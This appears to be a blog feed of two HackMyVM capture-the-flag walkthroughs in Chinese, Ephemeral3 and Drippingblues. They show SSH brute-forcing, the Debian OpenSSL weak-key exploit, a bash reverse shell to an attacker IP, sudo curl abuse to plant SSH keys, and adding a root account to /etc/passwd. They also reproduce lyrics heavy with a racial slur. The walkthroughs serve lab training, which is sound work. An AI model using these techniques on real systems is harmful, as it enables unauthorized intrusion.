===============================================================
/index.html           (Status: 200) [Size: 10918]
/.html                (Status: 403) [Size: 278]
/note.txt             (Status: 200) [Size: 159]
/agency               (Status: 301) [Size: 315] [--> http://192.168.0.101/agency/]                        
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]

# html-freebie-agency-perfect
Agency Perfect is a responsive HTML5 template with a clean and professional design which will be a great solution for creative agencies. Agency Perfect was built with awesome Twitter Bootstrap v3 and it includes a number of predefined pages. Since it is responsive, the layout will adapt to different screen sizes which will make your website be compatible with any device such as smart phones, tablets or desktop computers.

Agency Perfect 是一个响应式 HTML5 模板，设计简洁且专业，非常适合创意型机构使用。Agency Perfect 基于强大的 Twitter Bootstrap v3 构建，并包含多个预定义页面。由于它是响应式的，布局可以适应不同屏幕尺寸，使您的网站能够兼容各种设备，如智能手机、平板电脑或台式电脑。

网页界面

randy@ephemeral.com
info@agencyperfect.com
pixelperfectmk@gmail.com

John Smith 
Marc Jones 
Linda Smith

Hey! I just generated your keys with OpenSSL. You should be able to use your private key now! 

If you have any questions just email me at henry@ephemeral.com

Hey! I just generated your keys with OpenSSL. You should be able to use your private key now! 

If you have any questions just email me at henry@ephemeral.com

randy和henry

创建字典

John Smith 
Marc Jones 
Linda Smith

┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/username-anarchy]
└─# ./username-anarchy --input-file ../../hmv/users.txt > test_users

SSH爆破

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# hydra -L test_users -P /usr/share/wordlists/rockyou.txt 192.168.0.101 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-14 05:00:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 602464758 login tries (l:42/p:14344399), ~37654048 tries per task
[DATA] attacking ssh://192.168.0.101:22/

[INFO] Successful, password authentication is supported
[ERROR] could not connect to target port 22: Connection reset by peer

说明：

SSH 允许密码认证（不是 key-only）

但 在多次快速连接后主动 reset TCP

没思路了

openssl 漏洞利用

根据给的note.txt提示，尝试使用openssl漏洞

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# searchsploit openssl ssh
------------------- ---------------------------------
 Exploit Title     |  Path
------------------- ---------------------------------
OpenSSL 0.9.8c-1 < | linux/remote/5622.txt
OpenSSL 0.9.8c-1 < | linux/remote/5632.rb
OpenSSL 0.9.8c-1 < | linux/remote/5720.py
------------------- ---------------------------------
Shellcodes: No Results


┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# searchsploit -m linux/remote/5720.py
  Exploit: OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
      URL: https://www.exploit-db.com/exploits/5720
     Path: /usr/share/exploitdb/exploits/linux/remote/5720.py
    Codes: OSVDB-45029, CVE-2008-3280, CVE-2008-0166
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/hmv/5720.py

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# python2 5720.py 

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
./exploit.py <dir> <host> <user> [[port] [threads]]
    <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash
    <host>: The victim host
    <user>: The user of the victim host
    [port]: The SSH port of the victim host (default 22)
    [threads]: Number of threads (default 4) Too big numer is bad

发现缺少

: Path to SSH privatekeys (ex. /home/john/keys) without final slash

┌──(web)─(root㉿kali)-[/]
└─# searchsploit -x /linux/remote/5622.txt

1. Download http://sugar.metasploit.com/debian_ssh_rs
a_2048_x86.tar.bz2
            https://gitlab.com/exploit-database/explo
itdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 
(debian_ssh_rsa_2048_x86.tar.bz2)

┌──(web)─(root㉿kali)-[~]
└─# tar jxf 5622.tar.bz2

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# python2 5720.py ~/rsa/2048 192.168.0.101 randy 

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
The authenticity of host '192.168.0.101 (192.168.0.101)' can't be established.
ED25519 key fingerprint is SHA256:Q3PyaanJJfcfx3mqkxE35gi3m6xmdaPE1FHLQufrRHw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? The authenticity of host '192.168.0.101 (192.168.0.101)' can't be established.
ED25519 key fingerprint is SHA256:Q3PyaanJJfcfx3mqkxE35gi3m6xmdaPE1FHLQufrRHw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? The authenticity of host '192.168.0.101 (192.168.0.101)' can't be established.
ED25519 key fingerprint is SHA256:Q3PyaanJJfcfx3mqkxE35gi3m6xmdaPE1FHLQufrRHw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? The authenticity of host '192.168.0.101 (192.168.0.101)' can't be established.
ED25519 key fingerprint is SHA256:Q3PyaanJJfcfx3mqkxE35gi3m6xmdaPE1FHLQufrRHw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Tested 62 keys | Remaining 32706 keys | Aprox. Speed 12/sec
Tested 186 keys | Remaining 32582 keys | Aprox. Speed 24/sec

.............
Tested 15729 keys | Remaining 17039 keys | Aprox. Speed 53/sec
Tested 15818 keys | Remaining 16950 keys | Aprox. Speed 17/sec
Tested 15827 keys | Remaining 16941 keys | Aprox. Speed 1/sec
Tested 16032 keys | Remaining 16736 keys | Aprox. Speed 41/sec
Tested 16246 keys | Remaining 16522 keys | Aprox. Speed 42/sec
 
Key Found in file: 0028ca6d22c68ed0a1e3f6f79573100a-31671
Execute: ssh -lrandy -p22 -i /root/rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.0.101
 
Tested 16289 keys | Remaining 16479 keys | Aprox. Speed 8/sec

ssh登录

┌──(web)─(root㉿kali)-[/]
└─# ssh -lrandy -p22 -i /root/rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.0.101
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.13.0-30-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

150 updates can be applied immediately.
82 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Fri Jun 24 01:17:05 2022 from 10.0.0.69
randy@ephemeral:~$

提权

提权-henry

randy@ephemeral:/home/henry$ sudo -l
Matching Defaults entries for randy on ephemeral:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User randy may run the following commands on
        ephemeral:
    (henry) NOPASSWD: /usr/bin/curl

vi /tmp/reverse.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.0.106/4444 0>&1

chmod 777 reverse.sh

sudo -u henry curl "file:///tmp/reverse.sh"

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# pwncat-cs -lp 4444                             
[06:22:24] Welcome to pwncat 🐈!      __main__.py:164
[06:22:25] received connection from        bind.py:84
           192.168.0.101:56536                       
[06:22:25] 192.168.0.101:56536:        manager.py:957
           registered new host w/ db                 
(local) pwncat$ back
(remote) randy@ephemeral:/tmp$

弹出来的还是randy

curl | GTFOBins

本地生成密钥，保存公钥到 henry 的目录中：

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# ssh-keygen -t rsa -f /home/kali/Desktop/hmv/henry
Generating public/private rsa key pair.
Enter passphrase for "/home/kali/Desktop/hmv/henry" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/Desktop/hmv/henry
Your public key has been saved in /home/kali/Desktop/hmv/henry.pub
The key fingerprint is:
SHA256:/DtUrPDeYlWSRoBNf4A86JW2QUJlHAw1taigAFiXIVU root@kali
The key's randomart image is:
+---[RSA 3072]----+
|o.o.++E.+&X*o    |
|.. o.   oo%+.o   |
|  .   .. o.*o..  |
|   . . oo.. *..  |
|    .   So + o   |
|         .+ .    |
|         o.o     |
|          =..    |
|         ..o     |
+----[SHA256]-----+

sudo -u henry /usr/bin/curl http://192.168.0.106:8888/henry.pub -o /home/henry/.ssh/authorized_keys

提权-root

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# 
ssh -i /home/kali/Desktop/hmv/henry henry@192.168.0.101
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.13.0-30-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

150 updates can be applied immediately.
82 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Fri Jun 24 01:30:47 2022 from 10.0.0.69
henry@ephemeral:~$

henry@ephemeral:~$ cat user.txt 
9c8e36b0cb30f09300592cb56bca0c3a

henry@ephemeral:~$ find /etc -type f -writable 2>/dev/null
/etc/passwd

发现/etc/passwd可以有写入权限

henry@ephemeral:~$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/
henry@ephemeral:~$ head -20 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin

# 创建新用户 evilroot
echo "evilroot:\$1\$abc\$BXBqpb9BZcZhXLgbee.0s/:0:0:Evil Root:/root:/bin/bash" >> /etc/passwd
# 测试登录
su evilroot
# 密码: password

root@ephemeral:~# cat root.txt 
b0a3dec84d09f03615f768c8062cec4d

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/ephemeral3/

HMV-Drippingblues

呼啸山庄 — Tue, 13 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.100   08:00:27:91:92:9c       (Unknown)

nmap扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-12 11:23 EST
Nmap scan report for mail.codeshield.hmv (192.168.0.100)
Host is up (0.00036s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.0.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
|   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-robots.txt: 2 disallowed entries 
|_/dripisreal.txt /etc/dripispowerful.html
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.53 seconds

80端口

 driftingblues is hacked again so it's now called drippingblues. :D hahaha
by
travisscott & thugger 

driftingblues 又一次被黑了，所以现在改名叫 drippingblues。😄 哈哈哈
作者：
travisscott 和 thugger

目录扫描(dirsearch + gobuster)

User-agent: *
Disallow: /dripisreal.txt
Disallow: /etc/dripispowerful.html

hello dear hacker wannabe,

go for this lyrics:

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

count the n words and put them side by side then md5sum it

ie, hellohellohellohello >> md5sum hellohellohellohello

it's the password of ssh

你好，亲爱的黑客菜鸟，

去看看这首歌的歌词：
https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

统计里面所有的 n-word（nigger 的缩写）出现次数，把它们一个接一个拼在一起，然后对结果做 md5 校验

例如：hellohellohellohello → 对 hellohellohellohello 执行 md5sum

这个 md5 值就是 SSH 的密码

歌词处理

<div>
<!-- Usage of azlyrics.com content by any third-party lyrics provider is prohibited by our licensing agreement. Sorry about that. -->
<i>[Young Thug:]</i><br>
Pour that shit up fool, it's ours<br>
Ha<br>
Monster!<br>
Man so you ain't gon' pour?<br>
Oh, so you're gonna make a nigga beg you to pour?<br>
Okay bool, you dig?<br>
(Wheezy Beats)<br>
Uh<br>
<br>
Hopped out my motherfuckin' bed<br>
Hopped in the motherfuckin' coupe (Skrrt)<br>
Pulled up on the Birdman (Brr)<br>
I'm a beast, I'm a beast, I'm a mobster (Ayy)<br>
You got 50 whole bands, you'll be my sponsor (Just for the night)<br>
Them snakes on the plane, me and Kanye-conda (Anacondas)<br>
Yeah (Them anacondas)<br>
I might piece him up and let my partner smoke him (Triple cross)<br>
Chuck-E-Cheese him up, I pizza him, I roll him (Cross)<br>
I'm a gangster, I don't dance, baby I poke<br>
Right now I'm surrounded by some gangsters from Magnolia<br>
I heard I put it in the spot, yes sir she told me<br>
My niggas muggin', these niggas YSL only<br>
I heard my Nolia niggas not friendly, like no way<br>
But we not friendly either, you know it<br>
Ha!<br>
Yeah, thumbs up<br>
I've seen more holes than a golf course on Donald Trump's course<br>
My bitch a tall blooded horse, nigga, bronco<br>
And if you catch us down bet you're not gon' trunk us (No)<br>
You got a body, lil' nigga, we got a ton of 'em (Yeah)<br>
You got some Robin's, lil' nigga, we got some Batmans<br>
I let that choppa go &quot;blocka, blocka,&quot; get back, son (Back)<br>
You got them MJs, nigga, I got them Jacksons (Racks)<br>
<br>
But really what is it to do<br>
When the whole world constantly hatin' on you?<br>
Pussy niggas hold their nuts, masturbatin' on you<br>
Meanwhile the fuckin' federal baitin' on you<br>
Nigga tell me what you do<br>
Would you stand up or would you turn to a pussy nigga?<br>
I got a hundred things to do<br>
And I can stop rappin' but I can't stop stackin' fuckin' figures<br>
<br>
<i>[Birdman &amp; Young Thug:]</i><br>
Yeah, I'm from that motherfuckin' 'Nolia, nigga ('Nolia, nigga)<br>
Birdman'll break a nigga nose, lil' nigga (Nose, lil' nigga, ah)<br>
You need to slow your fuckin' roll, lil' nigga (Roll, lil' nigga, Thugger)<br>
We created Ks on shoulders, nigga (Shoulders, nigga)<br>
I'm a scary fuckin' sight, lil' nigga (Sight, lil' nigga, ah)<br>
We won a hundred mil' on fights, lil' nigga (Fights, lil' nigga, hey)<br>
A hundred bands, sure you're right, lil' nigga (Right, lil' nigga)<br>
I keep some AKs on my flights, lil' nigga (My flights, lil' nigga, I do)<br>
Birdman Willie B (What?)<br>
Smoke some stunna blunts, now my eyes Chinese (Chinese)<br>
Hundred K on private flights overseas (Overseas)<br>
Choppas City nigga, free BG (BG)<br>
Bentley with the doors all 'round, not a Jeep (Jeep)<br>
Rich nigga shit, smoke two pounds in a week (In a week)<br>
Can't find a bitch that don't know we them streets (We them streets)<br>
Bitches know that I am Birdman, that's OG, brrat<br>
<br>
<i>[Young Thug:]</i><br>
But really what is it to do<br>
When the whole world constantly hatin' on you?<br>
Pussy niggas hold their nuts, masturbatin' on you<br>
Meanwhile the fuckin' federal baitin' on you<br>
Nigga tell me what you do<br>
Would you stand up or would you turn to a pussy nigga?<br>
I got a hundred things to do<br>
And I can stop rappin' but I can't stop stackin' fuckin' figures<br>
<br>
Nigga, I'm a crack addict<br>
Thought about lettin' them get a cut<br>
Then I went and snagged at it<br>
Yeah, the new Boosie Badazz at it<br>
I'ma drop a nigga life, just like a bad habit<br>
I stick to the ground like a motherfuckin' rug<br>
I'm a big dog, lil' fuck nigga, you a pup<br>
Lil' bitch, clean your drawers before you think you're a thug<br>
Before I be in front your shows, just like your pub<br>
I ain't even lyin', baby<br>
I swear to God I ain't lyin', baby, no<br>
First I'll screw you without these pliers, baby, or<br>
I might dap you like, &quot;good try, baby&quot;<br>
Big B livin', baby<br>
Them boys on my left throwin' up Cs<br>
I promise their mama see them this week<br>
And I don't break promises with my Ds (Them my dogs)<br>
I want Ms and cheese, mister Mickey Ds<br>
She know I am a beast, I am so obese (Rrar)<br>
In Miami I swear they don't got good weed<br>
Wiz Khalifa can you send me some weed please?<br>
<br>
<i>[Birdman:]</i><br>
Yeah, overseas, nigga, top floor, clear windows, nigga<br>
Glass house, drankin' GT, you understand?<br>
We in that Red Light District, you understand?<br>
We 3 and 1, that mean 3 on me, nigga, you understand me?<br>
Just livin' the life, boy, ayy, Thug, just a dollar for a 1, nigga<br>
We can blow a mil', boy<br>
Rich Gang, YSL, blatt!
</div>

<br>
<br>

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# sed 's/<[^>]*>//g' lyrics.html > lyrics.txt
                                                                                                    
┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# grep -oiw 'nigga\|niggas' lyrics.txt | wc -l

40

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# yes nigga | head -n 40 | tr -d '\n' > payload.txt
cat payload.txt
md5sum payload.txt

nigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigganigga
67aff0e8f24f431a9f31899e0c18839b  payload.txt

得到密码67aff0e8f24f431a9f31899e0c18839b

21端口

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# ftp 192.168.0.100 
Connected to 192.168.0.100.
220 (vsFTPd 3.0.3)
Name (192.168.0.100:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||32468|)
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip
226 Directory send OK.
ftp> get respectmydrip.zip
local: respectmydrip.zip remote: respectmydrip.zip
229 Entering Extended Passive Mode (|||13382|)
150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes).
100% |***************************************************************|   471        2.03 MiB/s    00:00 ETA
226 Transfer complete.
471 bytes received in 00:00 (783.57 KiB/s)
ftp>

压缩包解密

尝试解压发现有密码，进行破解

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# unzip respectmydrip.zip 
Archive:  respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password: 
password incorrect--reenter:                                                                                                             
┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# zip2john respectmydrip.zip > hash
ver 2.0 respectmydrip.zip/respectmydrip.txt PKZIP Encr: cmplen=32, decmplen=20, crc=5C92F12B ts=96AB cs=5c92 type=0
ver 2.0 respectmydrip.zip/secret.zip is not encrypted, or stored with non-handled compression type
                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
072528035        (respectmydrip.zip/respectmydrip.txt)     
1g 0:00:00:01 DONE (2026-01-12 11:46) 0.6666g/s 9284Kp/s 9284Kc/s 9284KC/s 072551..0713932315
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

just focus on "drip"

关键就在 ‘drip’”

网页解密

结合之前的/robots.txt中Disallow: /etc/dripispowerful.html

拼接链接

http://192.168.0.100/?drip=/etc/dripispowerful.html

</style>
password is:
imdrippinbiatch
</body>
</html>

<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>

👉 密码是：
imdrippinbiatch

尝试解压secret.zip失败了

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# unzip secret.zip       
Archive:  secret.zip
[secret.zip] secret.txt password: 
password incorrect--reenter:

ssh连接

在网页端我们得知俩个作者为travisscott & thugger

尝试登录

thugger/imdrippinbiatch

成功登录

thugger@drippingblues:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
thugger@drippingblues:~$ cat user.txt
5C50FC503A2ABE93B4C5EE3425496521

thugger@drippingblues:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
thugger:x:1001:1001:,,,:/home/thugger:/bin/bash
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
mysql:x:127:133:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:128:134:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin

┌──(root㉿kali)-[/home/kali/Desktop/tools/linux-exploit-suggester]
└─# scp linux-exploit-suggester.sh thugger@192.168.0.100:/tmp/

thugger@192.168.0.100's password: 
linux-exploit-suggester.sh                                                100%   89KB  37.2MB/s   00:00

thugger@drippingblues:/tmp$ ./linux-exploit-suggester.sh 

Available information:

Kernel version: 5.11.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 20.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

81 kernel space exploits
49 user space exploits

Possible Exploits:

[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops

   Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   Exposure: highly probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: [ ubuntu=(20.04|21.04) ],debian=11
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

提权

pwnkit的漏洞

